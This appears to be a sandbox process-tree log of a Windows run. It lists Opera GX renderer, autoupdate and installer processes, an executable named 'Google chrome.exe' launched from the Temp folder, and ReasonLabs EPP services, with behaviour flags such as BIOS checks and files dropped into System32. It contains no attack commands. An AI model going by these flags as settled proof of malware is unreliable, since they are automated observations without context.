C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=8988,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9260 /prefetch:12⤵PID:7344
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --field-trial-handle=9624,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9656 /prefetch:12⤵PID:3220
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=6416,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7040 /prefetch:12⤵PID:8716
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --field-trial-handle=9792,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:12⤵PID:8500
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --field-trial-handle=7600,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9244 /prefetch:12⤵
- Checks computer location settings
PID:2436
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --field-trial-handle=9456,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7780 /prefetch:12⤵PID:3824
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --field-trial-handle=9312,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8708 /prefetch:12⤵PID:10296
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --field-trial-handle=8632,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9908 /prefetch:12⤵PID:11064
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --field-trial-handle=9808,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8112 /prefetch:12⤵PID:9352
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --field-trial-handle=9700,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8832 /prefetch:12⤵PID:7536
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6208,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9932 /prefetch:82⤵PID:8292
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7416,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9704 /prefetch:82⤵PID:10356
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --edition=std-2 --host=https://autoupdate.geo.opera.com/ --installationdatadir="C:\Users\Admin\AppData\Local\Programs\Opera GX" --installdir="C:\Users\Admin\AppData\Local\Programs\Opera GX" --lang=en-US --pipeid --producttype --requesttype=shutdown --version=109.0.5097.98 --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" --firstrunver=109.0.5097.98 --firstrunts=1716406989 --consent-info=eyJzdGF0aXN0aWNzX2NvbGxlY3Rpb25fZW5hYmxlZCI6dHJ1ZSwidXNlcl9leHBlcmllbmNlX21ldHJpY3NfcmVwb3J0aW5nX2VuYWJsZWQiOnRydWV92⤵PID:6152
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ff60529f8f4,0x7ff60529f900,0x7ff60529f9103⤵PID:11512
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe" --scheduledautoupdate --autoupdaterequesttype=automatic --autoupdateoperaversion=109.0.5097.98 --newautoupdaterlogic1⤵PID:8972
-
C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe" --version2⤵PID:3340
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --edition=std-2 --pipeid=oauc_task_pipec12dca2c6d0f4844aad7502765c89329 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC" --scheduledtask2⤵PID:10080
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\Crash Reports" --crash-count-file=C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\crash_count.txt --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ff60529f8f4,0x7ff60529f900,0x7ff60529f9103⤵PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\9B44A87EC5AC\installer.exe" --version3⤵PID:10312
-
-
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:8832
-
C:\Program Files\ReasonLabs\EPP\rsWSC.exe"C:\Program Files\ReasonLabs\EPP\rsWSC.exe"1⤵
- Modifies data under HKEY_USERS
PID:11136
-
C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe"C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe"1⤵PID:9960
-
C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe"C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe"1⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:8948 -
\??\c:\program files\reasonlabs\epp\rsHelper.exe"c:\program files\reasonlabs\epp\rsHelper.exe"2⤵PID:8384
-
-
\??\c:\program files\reasonlabs\EPP\ui\EPP.exe"c:\program files\reasonlabs\EPP\ui\EPP.exe" --minimized --first-run2⤵PID:1616
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" "c:\program files\reasonlabs\EPP\ui\app.asar" --engine-path="c:\program files\reasonlabs\EPP" --minimized --first-run3⤵PID:9464
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2480 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:24⤵PID:3796
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=3124 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:84⤵PID:10464
-
-
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=3336 --field-trial-handle=2484,i,1707590230716067083,9506986509640931280,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:14⤵
- Checks computer location settings
PID:1404
-
-
